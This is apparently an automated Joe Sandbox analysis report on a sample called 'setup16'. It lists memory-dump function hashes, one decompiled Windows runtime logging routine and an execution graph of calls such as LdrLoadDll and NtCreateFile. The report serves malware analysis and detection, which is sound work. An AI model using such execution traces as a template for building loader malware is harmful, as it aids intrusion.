                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B90047130105C43F100717D4404F470405D7F0345F51C417F0115755DC755FC517571
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09610 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 5a111f8da49017108d11bd3d0ed70f0c49942c3895c32012b23484bf337805f2
                                                                                                                                                                                                        • Instruction ID: bd45c478b5def5202539fba88523a721e494d50382a8ae5ccf4e2556a0533ffb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a111f8da49017108d11bd3d0ed70f0c49942c3895c32012b23484bf337805f2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C90027160505802F15071694414746040597D0345F51C411A0015655D8795EA5576E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09A10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 072fe7dab4d5cacb5d4de0774b64f3fe9ce19226a22b19f429641f8c2854af21
                                                                                                                                                                                                        • Instruction ID: 6322375b1fe6a9b5f04a0aa485f3d491bd2fdf87ce710cca5afc348be828b9b2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 072fe7dab4d5cacb5d4de0774b64f3fe9ce19226a22b19f429641f8c2854af21
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB90027120145402F10061694808747040597D0346F51C411A5155556E86A5E8917571
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09650 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 49c01a8d3644e4baf49dd66c123580f6d8f1905a3aa6638798d620f4d161bbf6
                                                                                                                                                                                                        • Instruction ID: 80aa0e34316c4031a1d7d5333b7a20ac8e286cb07ad3c45f91a0f8771bb33d53
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49c01a8d3644e4baf49dd66c123580f6d8f1905a3aa6638798d620f4d161bbf6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A890027120509842F14071694404A46041597D0349F51C411A0055695D9665ED55B6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A0A3B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 8f7b912ebad40143075fb679cbf17ed76013b80ec1542f22f9e02a1339ded399
                                                                                                                                                                                                        • Instruction ID: fe9e5ca8b6c48e25af67aada43512084d537315f10206f0cebcddaca455f6b21
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f7b912ebad40143075fb679cbf17ed76013b80ec1542f22f9e02a1339ded399
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A890027120149002F1407169844460B5405A7E0345F51C811E0416555C8655E856A261
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09730 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a5700ca41d1f5b376c087800fafc7c942a556b54ec7856947d47ebe677a1d473
                                                                                                                                                                                                        • Instruction ID: 1113933343f5631d34ab76369d6ca40adb4ad99151f2037fa790e9ec44e2ed65
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5700ca41d1f5b376c087800fafc7c942a556b54ec7856947d47ebe677a1d473
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D90026160505402F14071695418706041597D0245F51D411A0015555DC699EA5576E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09B00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 9841a137615658200118b0a2ca9e0e6c611b7b614f7f749703bdbb7d79606cde
                                                                                                                                                                                                        • Instruction ID: a29f72a176e287845e600d43c7ecf4ab68f2550b7689027e4456e2d4a881759e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9841a137615658200118b0a2ca9e0e6c611b7b614f7f749703bdbb7d79606cde
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B90026124105802F140716984147070406D7D0645F51C411A0015555D8656E96576F1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A0A710 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 79310f266b555490823c5986733b4cf53d8d5e7f70f8b2fac9b9f74237ef8a11
                                                                                                                                                                                                        • Instruction ID: f60fe576cca8ecde8d7bcda720d79efdf338038d8111370cfe5a5af65f6a45c9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79310f266b555490823c5986733b4cf53d8d5e7f70f8b2fac9b9f74237ef8a11
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A90027130105052B500A6A95804A4A450597F0345B51D415A4005555C8594E8616161
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09760 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1dd7c189417665829affdf048342f6987077d9bcb34928cd735e8c20a50a275c
                                                                                                                                                                                                        • Instruction ID: 242b737db3a9ed1d7c0b650e703b7617e6278018d52291faa975172bb07cfe0f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1dd7c189417665829affdf048342f6987077d9bcb34928cd735e8c20a50a275c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9490047130105403F100717D550C7070405D7D0345F51DC11F041555DDD7D7FC517171
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09770 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 78e8b25fb078d5f4dbfdd9b7c9389d17fa4f832c1f2828eb00010de35648a6f9
                                                                                                                                                                                                        • Instruction ID: ee1a5a71dce4d445e38ef8b2f856e1fe7756bc16d897741b2e4a764359b4d47c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78e8b25fb078d5f4dbfdd9b7c9389d17fa4f832c1f2828eb00010de35648a6f9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF90026120509442F10065695408A06040597D0249F51D411A1055596DC675E851B171
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A0A770 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: dd19d374fdd5441b1a18370aa8a0453b728673256a1a3a02cc75b2b633f4ce0e
                                                                                                                                                                                                        • Instruction ID: 1b4554f0d9a953ead231fe9a82b0d0bab993da7bdbfc6608a44f939913b01662
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd19d374fdd5441b1a18370aa8a0453b728673256a1a3a02cc75b2b633f4ce0e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D90027520509442F50065695804A87040597D0349F51D811A041559DD8694E861B161
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                        • Instruction ID: 4af49b4debd32853b5af90fd903f7cf3cc745ccddbaf6d8d9f856e739b8189b7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A5FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E04A5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04A0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04A55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04A55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                                                                                                        0x04a5fdda
                                                                                                                                                                                                        0x04a5fde2
                                                                                                                                                                                                        0x04a5fde5
                                                                                                                                                                                                        0x04a5fdec
                                                                                                                                                                                                        0x04a5fdfa
                                                                                                                                                                                                        0x04a5fdff
                                                                                                                                                                                                        0x04a5fe0a
                                                                                                                                                                                                        0x04a5fe0f
                                                                                                                                                                                                        0x04a5fe17
                                                                                                                                                                                                        0x04a5fe1e
                                                                                                                                                                                                        0x04a5fe19
                                                                                                                                                                                                        0x04a5fe19
                                                                                                                                                                                                        0x04a5fe19
                                                                                                                                                                                                        0x04a5fe20
                                                                                                                                                                                                        0x04a5fe21
                                                                                                                                                                                                        0x04a5fe22
                                                                                                                                                                                                        0x04a5fe25
                                                                                                                                                                                                        0x04a5fe40

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A5FDFA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04A5FE01
                                                                                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04A5FE2B
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                                                                                        • API String ID: 885266447-3903918235
                                                                                                                                                                                                        • Opcode ID: 91beee2d500e75e08af51cbf62eedc8e4e7ee6f2691727f8cd573e3269268cdb
                                                                                                                                                                                                        • Instruction ID: e42b4a156f8457ee7e9560d7afacb33308b95ad7a561d2e4bbd37e591cfb9d60
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91beee2d500e75e08af51cbf62eedc8e4e7ee6f2691727f8cd573e3269268cdb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDF02B72600201BFEA251B45DE06F63BF6AEB84730F244354FA68565E1EA72F87097F4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:4.4%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:709
                                                                                                                                                                                                        Total number of Limit Nodes:89
                                                                                                                                                                                                        execution_graph 32417 e8f28d 32420 e8ba60 32417->32420 32421 e8ba86 32420->32421 32428 e79160 32421->32428 32423 e8ba92 32424 e8bab6 32423->32424 32436 e78440 32423->32436 32468 e8a660 32424->32468 32471 e790b0 32428->32471 32430 e7916d 32431 e79174 32430->32431 32483 e79050 32430->32483 32431->32423 32437 e78467 32436->32437 32899 e7a610 32437->32899 32439 e78479 32903 e7a360 32439->32903 32441 e78496 32442 e7849d 32441->32442 32956 e7a290 LdrLoadDll 32441->32956 32465 e785e4 32442->32465 32907 e7d770 32442->32907 32445 e78506 32446 e8c0b0 LdrLoadDll 32445->32446 32445->32465 32447 e7851c 32446->32447 32448 e8c0b0 LdrLoadDll 32447->32448 32449 e7852d 32448->32449 32450 e8c0b0 LdrLoadDll 32449->32450 32451 e7853e 32450->32451 32919 e7b4d0 32451->32919 32453 e78551 32454 e856a0 7 API calls 32453->32454 32455 e78562 32454->32455 32456 e856a0 7 API calls 32455->32456 32457 e78573 32456->32457 32458 e78593 32457->32458 32931 e7c040 32457->32931 32460 e856a0 7 API calls 32458->32460 32463 e785db 32458->32463 32466 e785aa 32460->32466 32937 e78220 32463->32937 32465->32424 32466->32463 32958 e7c0e0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32466->32958 32469 e8af60 LdrLoadDll 32468->32469 32470 e8a67f 32469->32470 32472 e790c3 32471->32472 32522 e88b80 LdrLoadDll 32471->32522 32502 e88a30 32472->32502 32475 e790d6 32475->32430 32476 e790cc 32476->32475 32505 e8b310 32476->32505 32478 e79113 32478->32475 32516 e78ed0 32478->32516 32480 e79133 32523 e78920 LdrLoadDll 32480->32523 32482 e79145 32482->32430 32874 e8b600 32483->32874 32486 e8b600 LdrLoadDll 32487 e7907b 32486->32487 32488 e8b600 LdrLoadDll 32487->32488 32489 e79091 32488->32489 32490 e7d570 32489->32490 32491 e7d589 32490->32491 32882 e7a490 32491->32882 32493 e7d59c 32886 e8a190 32493->32886 32496 e79185 32496->32423 32498 e7d5c2 32499 e7d5ed 32498->32499 32892 e8a210 32498->32892 32501 e8a440 2 API calls 32499->32501 32501->32496 32524 e8a5b0 32502->32524 32506 e8b329 32505->32506 32537 e856a0 32506->32537 32508 e8b341 32509 e8b34a 32508->32509 32576 e8b150 32508->32576 32509->32478 32511 e8b35e 32511->32509 32593 e89eb0 32511->32593 32852 e77210 32516->32852 32518 e78ef1 32518->32480 32519 e78eea 32519->32518 32865 e774d0 32519->32865 32522->32472 32523->32482 32527 e8af60 32524->32527 32526 e88a45 32526->32476 32528 e8afe5 32527->32528 32530 e8af6f 32527->32530 32528->32526 32530->32528 32531 e85aa0 32530->32531 32532 e85aae 32531->32532 32533 e85aba 32531->32533 32532->32533 32536 e85f20 LdrLoadDll 32532->32536 32533->32528 32535 e85c0c 32535->32528 32536->32535 32538 e859d5 32537->32538 32539 e856b4 32537->32539 32538->32508 32539->32538 32601 e89c00 32539->32601 32542 e857e0 32605 e8a310 32542->32605 32543 e857c3 32663 e8a410 LdrLoadDll 32543->32663 32546 e85807 32548 e8bee0 2 API calls 32546->32548 32547 e857cd 32547->32508 32550 e85813 32548->32550 32549 e85999 32552 e8a440 2 API calls 32549->32552 32550->32547 32550->32549 32551 e859af 32550->32551 32556 e858a2 32550->32556 32672 e853e0 LdrLoadDll NtReadFile NtClose 32551->32672 32554 e859a0 32552->32554 32554->32508 32555 e859c2 32555->32508 32557 e85909 32556->32557 32559 e858b1 32556->32559 32557->32549 32558 e8591c 32557->32558 32665 e8a290 32558->32665 32561 e858ca 32559->32561 32562 e858b6 32559->32562 32565 e858cf 32561->32565 32566 e858e7 32561->32566 32664 e852a0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32562->32664 32608 e85340 32565->32608 32566->32554 32620 e85060 32566->32620 32568 e858c0 32568->32508 32571 e8597c 32669 e8a440 32571->32669 32572 e858dd 32572->32508 32573 e858ff 32573->32508 32575 e85988 32575->32508 32578 e8b16b 32576->32578 32577 e8b17d 32577->32511 32578->32577 32690 e8be60 32578->32690 32580 e8b19d 32693 e84cc0 32580->32693 32582 e8b1c0 32582->32577 32583 e84cc0 2 API calls 32582->32583 32585 e8b1e2 32583->32585 32585->32577 32725 e85fe0 32585->32725 32586 e8b26a 32588 e8b27a 32586->32588 32820 e8aee0 LdrLoadDll 32586->32820 32736 e8ad50 32588->32736 32590 e8b2a8 32815 e89e70 32590->32815 32594 e89ecc 32593->32594 32595 e8af60 LdrLoadDll 32593->32595 32846 4dc967a 32594->32846 32595->32594 32596 e89ee7 32598 e8bee0 32596->32598 32849 e8a620 32598->32849 32600 e8b3b9 32600->32478 32602 e89c15 32601->32602 32603 e8af60 LdrLoadDll 32602->32603 32604 e85794 32603->32604 32604->32542 32604->32543 32604->32547 32606 e8a32c NtCreateFile 32605->32606 32607 e8af60 LdrLoadDll 32605->32607 32606->32546 32607->32606 32609 e8535c 32608->32609 32610 e8a290 LdrLoadDll 32609->32610 32611 e8537d 32610->32611 32612 e85398 32611->32612 32613 e85384 32611->32613 32614 e8a440 2 API calls 32612->32614 32615 e8a440 2 API calls 32613->32615 32616 e853a1 32614->32616 32617 e8538d 32615->32617 32673 e8c0f0 LdrLoadDll 32616->32673 32617->32572 32619 e853ac 32619->32572 32621 e85061 32620->32621 32622 e850ab 32621->32622 32623 e850de 32621->32623 32625 e8a290 LdrLoadDll 32622->32625 32624 e85229 32623->32624 32629 e850fa 32623->32629 32626 e8a290 LdrLoadDll 32624->32626 32627 e850c6 32625->32627 32633 e85244 32626->32633 32628 e8a440 2 API calls 32627->32628 32630 e850cf 32628->32630 32631 e8a290 LdrLoadDll 32629->32631 32630->32573 32632 e85115 32631->32632 32635 e8511c 32632->32635 32636 e85131 32632->32636 32686 e8a2d0 LdrLoadDll 32633->32686 32638 e8a440 2 API calls 32635->32638 32639 e8514c 32636->32639 32640 e85136 32636->32640 32637 e8527e 32641 e8a440 2 API calls 32637->32641 32642 e85125 32638->32642 32648 e85151 32639->32648 32682 e8c0b0 32639->32682 32643 e8a440 2 API calls 32640->32643 32644 e85289 32641->32644 32642->32573 32645 e8513f 32643->32645 32644->32573 32645->32573 32656 e85163 32648->32656 32674 e8a3c0 32648->32674 32649 e851b7 32650 e851ce 32649->32650 32685 e8a250 LdrLoadDll 32649->32685 32651 e851ea 32650->32651 32652 e851d5 32650->32652 32655 e8a440 2 API calls 32651->32655 32654 e8a440 2 API calls 32652->32654 32654->32656 32657 e851f3 32655->32657 32656->32573 32658 e8521f 32657->32658 32677 e8bcb0 32657->32677 32658->32573 32660 e8520a 32661 e8bee0 2 API calls 32660->32661 32662 e85213 32661->32662 32662->32573 32663->32547 32664->32568 32666 e85964 32665->32666 32667 e8af60 LdrLoadDll 32665->32667 32668 e8a2d0 LdrLoadDll 32666->32668 32667->32666 32668->32571 32670 e8af60 LdrLoadDll 32669->32670 32671 e8a45c NtClose 32670->32671 32671->32575 32672->32555 32673->32619 32675 e8af60 LdrLoadDll 32674->32675 32676 e8a3dc NtReadFile 32675->32676 32676->32649 32678 e8bcbd 32677->32678 32679 e8bcd4 32677->32679 32678->32679 32680 e8c0b0 LdrLoadDll 32678->32680 32679->32660 32681 e8bceb 32680->32681 32681->32660 32687 e8a5e0 32682->32687 32684 e8c0c8 32684->32648 32685->32650 32686->32637 32688 e8af60 LdrLoadDll 32687->32688 32689 e8a5fc 32688->32689 32689->32684 32821 e8a4f0 32690->32821 32694 e84cd1 32693->32694 32695 e84cd9 32693->32695 32694->32582 32696 e84fac 32695->32696 32824 e8d090 32695->32824 32696->32582 32698 e84d2d 32699 e8d090 LdrLoadDll 32698->32699 32703 e84d38 32699->32703 32700 e84d86 32702 e8d090 LdrLoadDll 32700->32702 32706 e84d9a 32702->32706 32703->32700 32832 e8d130 LdrLoadDll RtlFreeHeap 32703->32832 32833 e8d1c0 32703->32833 32705 e84df7 32707 e8d090 LdrLoadDll 32705->32707 32706->32705 32708 e8d1c0 2 API calls 32706->32708 32709 e84e0d 32707->32709 32708->32706 32710 e84e4a 32709->32710 32712 e8d1c0 2 API calls 32709->32712 32711 e8d090 LdrLoadDll 32710->32711 32713 e84e55 32711->32713 32712->32709 32714 e8d1c0 2 API calls 32713->32714 32720 e84e8f 32713->32720 32714->32713 32717 e8d0f0 2 API calls 32718 e84f8e 32717->32718 32719 e8d0f0 2 API calls 32718->32719 32721 e84f98 32719->32721 32829 e8d0f0 32720->32829 32722 e8d0f0 2 API calls 32721->32722 32723 e84fa2 32722->32723 32724 e8d0f0 2 API calls 32723->32724 32724->32696 32726 e85ff1 32725->32726 32727 e856a0 7 API calls 32726->32727 32731 e86007 32727->32731 32728 e86010 32728->32586 32729 e86047 32730 e8bee0 2 API calls 32729->32730 32732 e86058 32730->32732 32731->32728 32731->32729 32733 e86093 32731->32733 32732->32586 32734 e8bee0 2 API calls 32733->32734 32735 e86098 32734->32735 32735->32586 32737 e8ad64 32736->32737 32738 e8abe0 LdrLoadDll 32736->32738 32839 e8abe0 32737->32839 32738->32737 32740 e8ad6d 32741 e8abe0 LdrLoadDll 32740->32741 32742 e8ad76 32741->32742 32743 e8abe0 LdrLoadDll 32742->32743 32744 e8ad7f 32743->32744 32745 e8abe0 LdrLoadDll 32744->32745 32746 e8ad88 32745->32746 32747 e8abe0 LdrLoadDll 32746->32747 32748 e8ad91 32747->32748 32749 e8abe0 LdrLoadDll 32748->32749 32750 e8ad9d 32749->32750 32751 e8abe0 LdrLoadDll 32750->32751 32752 e8ada6 32751->32752 32753 e8abe0 LdrLoadDll 32752->32753 32754 e8adaf 32753->32754 32755 e8abe0 LdrLoadDll 32754->32755 32756 e8adb8 32755->32756 32757 e8abe0 LdrLoadDll 32756->32757 32758 e8adc1 32757->32758 32759 e8abe0 LdrLoadDll 32758->32759 32760 e8adca 32759->32760 32761 e8abe0 LdrLoadDll 32760->32761 32762 e8add6 32761->32762 32763 e8abe0 LdrLoadDll 32762->32763 32764 e8addf 32763->32764 32765 e8abe0 LdrLoadDll 32764->32765 32766 e8ade8 32765->32766 32767 e8abe0 LdrLoadDll 32766->32767 32768 e8adf1 32767->32768 32769 e8abe0 LdrLoadDll 32768->32769 32770 e8adfa 32769->32770 32771 e8abe0 LdrLoadDll 32770->32771 32772 e8ae03 32771->32772 32773 e8abe0 LdrLoadDll 32772->32773 32774 e8ae0f 32773->32774 32775 e8abe0 LdrLoadDll 32774->32775 32776 e8ae18 32775->32776 32777 e8abe0 LdrLoadDll 32776->32777 32778 e8ae21 32777->32778 32779 e8abe0 LdrLoadDll 32778->32779 32780 e8ae2a 32779->32780 32781 e8abe0 LdrLoadDll 32780->32781 32782 e8ae33 32781->32782 32783 e8abe0 LdrLoadDll 32782->32783 32784 e8ae3c 32783->32784 32785 e8abe0 LdrLoadDll 32784->32785 32786 e8ae48 32785->32786 32787 e8abe0 LdrLoadDll 32786->32787 32788 e8ae51 32787->32788 32789 e8abe0 LdrLoadDll 32788->32789 32790 e8ae5a 32789->32790 32791 e8abe0 LdrLoadDll 32790->32791 32792 e8ae63 32791->32792 32793 e8abe0 LdrLoadDll 32792->32793 32794 e8ae6c 32793->32794 32795 e8abe0 LdrLoadDll 32794->32795 32796 e8ae75 32795->32796 32797 e8abe0 LdrLoadDll 32796->32797 32798 e8ae81 32797->32798 32799 e8abe0 LdrLoadDll 32798->32799 32800 e8ae8a 32799->32800 32801 e8abe0 LdrLoadDll 32800->32801 32802 e8ae93 32801->32802 32803 e8abe0 LdrLoadDll 32802->32803 32804 e8ae9c 32803->32804 32805 e8abe0 LdrLoadDll 32804->32805 32806 e8aea5 32805->32806 32807 e8abe0 LdrLoadDll 32806->32807 32808 e8aeae 32807->32808 32809 e8abe0 